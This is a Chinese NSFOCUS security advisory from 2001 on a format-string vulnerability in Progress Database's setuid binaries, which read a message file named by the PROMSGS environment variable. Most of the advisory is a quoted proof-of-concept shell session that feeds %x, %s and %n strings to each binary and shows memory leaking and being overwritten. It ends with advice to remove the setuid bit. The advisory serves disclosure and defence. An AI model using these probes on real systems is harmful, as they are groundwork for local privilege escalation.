首页 -> 安全研究
安全研究
安全漏洞
Progress Database 格式化字符串漏洞
发布日期:2001-11-02
更新日期:2001-11-05
受影响系统:
描述:
Progress Database 9.1C
- HP HP-UX 11.0
- IBM AIX 4.3.3
- RedHat Linux 6.2
- RedHat Linux 7.0
- RedHat Linux 7.1
- S.u.S.E. Linux 7.2
- Sun Solaris 2.6
BUGTRAQ ID: 3502
CVE(CAN) ID: CAN-2001-1129
Progress Database 是一款商业数据库产品,是由Progress Software 公司发布和维护
的。该数据库存在一个安全问题,可能导致本地攻击者提升权限。
Progress Database 存在格式化字符串漏洞。该数据库中很多程序依赖环境变量
“PROMSGS”来加载数据库依赖的文件,通过精心构造一个包含格式化字符串的文件,
如果运行setuid程序,当调用环境变量“PROMSGS”时,可能允许攻击者重写任意进程
内存,从而导致提升权限。
<*来源:KF (dotslash@snosoft.com)
链接:http://archives.neohapsis.com/archives/bugtraq/2001-11/0011.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
KF (dotslash@snosoft.com)提供了如下测试代码:
[elguapo@linux bin]$ echo blah > file
[elguapo@linux bin]$ export PROMSGS=./file
[elguapo@linux bin]$ ./_probuild
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 290
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 96
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 24
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
Test to make sure they fixed my original hole with the buffer overflows.
(looks fine)
[elguapo@linux bin]$ echo `perl -e 'print "A" x 20000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
Well if you use a format string instead of an A we get much better
results.
[elguapo@linux bin]$ echo `perl -e 'print "%x" x 9000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96. Message file is corrupt.
0x00x00x3e0x83c63500xbffff81c0x10x00x8062d350x3cc6140x00xbffffd4f0x782578250x782
578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7340x806
18450x00x83e3ec00x83e3ec00x83c7b200x900x83c63500xbffff81c0x10xbffff66c0x00x401e5
f2c0x10000x401e44a00xbffff6680x4013f2bd0x10000x401e5f2c0xbffff7180x4013f2aa%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
0x837a70e0x83c63500x83e970c0x00xbffff6240x807784b0x40x83e95b00x83c63500xbffff81c
0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x51
48004d0xbffff5440x83e3ec00xbffff6c40x83166430xbffff5440xbffff6040xc00xbffff5440x
83e3ec00xbffff5440x83e3ec00x83c63500x00x83e3ec00x50x2000x8a0xbffff5ad0x920xbffff
56d%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
[elguapo@linux bin]$ echo `perl -e 'print "%s" x 9000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
rcurctr overflow reading promsgs file.
(note the overflow msg)
[elguapo@linux bin]$ echo `perl -e 'print "%n" x 9000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96. Message file is corrupt.
0(tty)0(tty)6225424-20201(tty)0(tty)11573-148280(tty)-68928197281972819728197281
972819728197-2011-225262130(tty)16064160643152014425424-20201(tty)-24520(tty)243
64409617568-2456-3395409624364-2280-3414%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
-2277025424-268680(tty)-2524307954-2721625424-20200(tty)82240(tty)12857824682242
1057139041978977-274816064-236426179-2748-2556192-274816064-274816064254240(tty)
160645512138-2643146-2707%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
I am sure you get the idea...
ALL suids in the dlc/bin dir are affected
[elguapo@linux bin]$ ./_dbutil
Error formatting messaage 96. Message file is corrupt.
0x00x00x3e0x81159280xbffff77c0x00x00x805ec350x11cdf40x00xbffffd530x782578250x782
578250x782578250x782578250x782578250x782578250x782578250xbffff7250xbffff72c0x805
43750x00x81222a00x81222a00x81161c00x900x81159280xbffff77c0x00x00x40015b980x7c304
040x40012b4b0xbffff7000x40015a400x804bb1b0x00x10x400c4a4c0x400227c8%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
0x80fd96e0x81159280x81271340x00xbffff61c0x806540b0x40x8126fd80x81159280xbffff77c
0x00x804daea0x00x81222a00x10x81159280x2080xbffff7480xdff00000x00x00x00x616441740
x532f0x00x00xbffff7800x00x4e2069720x2020766f0x333120320x3a33313a0x322031310xa313
0300x8000ff000x80b00d0c0x3900ffb00x2043312e0x202020200x20202020%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
[elguapo@linux bin]$ ./_mprosrv
14:03:13 Error formatting messaage 96. Message file is corrupt.
14:03:13
0x00x00x3e0x812f6280xbffff82c0x10x00x3f0xfff5e40x00xbffffd510x782578250x78257825
0x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7200x80582250
x00x813e8c00x813e8c00x81300200x900x812f6280xbffff82c0x10x400003d40x400157e00x80x
40022c140x80x400c816c0x10x00x400229240xc0b8fae0x400227b8%
14:03:13 errno=0 reading promsgs file, it may have been deleted.
14:03:13 Unable to format message number 940
[elguapo@linux bin]$ ./_mprshut
Error formatting messaage 96. Message file is corrupt.
0x00x00x3e0x81802500xbffff82c0x10x00x805af750x1858740x00xbffffd510x782578250x782
578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff6a00x805
87650x00x819b8c00x819b8c00x8180d800x900x81802500xbffff82c0x10x00x00x00x00x00x00x
00x00x00x00x0%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 940
[elguapo@linux bin]$ ./_proapsv
14:03:33 02 Nov 2001
Error formatting messaage 96. Message file is corrupt.
14:03:33 02 Nov 2001
0x00x00x3e0x842f7f00xbffff8300xbffff82c0x00x80645050x435d140x00xbffffd510x78
2578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff825
0xbffff4180x80630150x00x84573200x84573200x84312200x900x842f7f00x00xbffff82c0
x40015a400x400154140x40015a400x805527a0xbffff3680x4000d3600x40015b940x40022c
900x70x00x180%
[elguapo@linux bin]$ ./_progres
Error formatting messaage 96. Message file is corrupt.
0x00x00x3e0x840eaf00xbffff82c0x10x00x80646750x414ff40x00xbffffd510x782578250x782
578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7440x806
31850x00x842d1200x842d1200x84105000x900x840eaf00xbffff82c0x10xbffff67c0x00x401e5
f2c0x10000x401e44a00xbffff6780x4013f2bd0x10000x401e5f2c0xbffff7280x4013f2aa%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
0x83bc8ce0x840eaf00x843296c0x00xbffff6340x807b0fb0x40x84328100x840eaf00xbffff82c
0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x51
48004d0xbffff5540x842d1200xbffff6d40x83587c30xbffff5540xbffff6140xc00xbffff5540x
842d1200xbffff5540x842d1200x840eaf00x00x842d1200x50x2000x8a0xbffff5bd0x920xbffff
57d%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
[elguapo@linux bin]$ ./_proutil
\Error formatting messaage 96. Message file is corrupt.
0x00x00x3e0x81ae9480xbffff82c0x10x00x80595d50x1b3f340x00xbffffd510x782578250x782
578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7200x805
80e50x00x81d77200x81d77200x81af4400x900x81ae9480xbffff82c0x10x40015b940x6dcac560
x40012b4b0xbffff6f00x40015a400x804cdee0x400c5a4c0x400227c80x400c255c0x400227c80x
0%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
0x817912e0x81ae9480x81dc5b40x00xbffff6100x806ea1b0x40x81dc4580x81ae9480xbffff82c
0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x51
48004d0xbffff5300x81d77200xbffff6b00x816cdd30xbffff5300xbffff5f00xc00xbffff5300x
81d77200xbffff5300x81d77200x81ae9480x00x81d77200x50x2000x8a0xbffff5990x920xbffff
559%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
[elguapo@linux bin]$ ./_rfutil
Error formatting messaage 96. Message file is corrupt.
0x00x00x3e0x812d0080xbffff82c0x10x00x80586b50x1324740x00xbffffd530x782578250x782
578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff71c0x805
71c50x00x81433e00x81433e00x812d9800x900x812d0080xbffff82c0x10x40015b940x6dcac560
x40012b4b0xbffff6ec0x40015a400x804c3a70x400c5a4c0x400227c80x400c255c0x400227c80x
bffff67c%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 940
[elguapo@linux bin]$ ./prolib
Error formatting messaage 96. Message file is corrupt.
0x00x00x3e0x806c4480x806e4ac0xbffff5fc0x00x00x00x00xbffffd550x782578250x78257825
0x782578250x782578250x782578250x782578250x782578250x7250xbffff3cc0x804b5590x00x8
06c4480x806e4ac0x7970x00x806e4ac0x00x00x00x00x00x00x00x00x00x00x00x00x0%errno=0
reading promsgs file, it may have been deleted.
Unable to format message number 1943
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 暂时去掉受影响应用程序的setuid位
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.progress.com/
浏览次数:7689
严重程度:0(网友投票)
绿盟科技给您安全的保障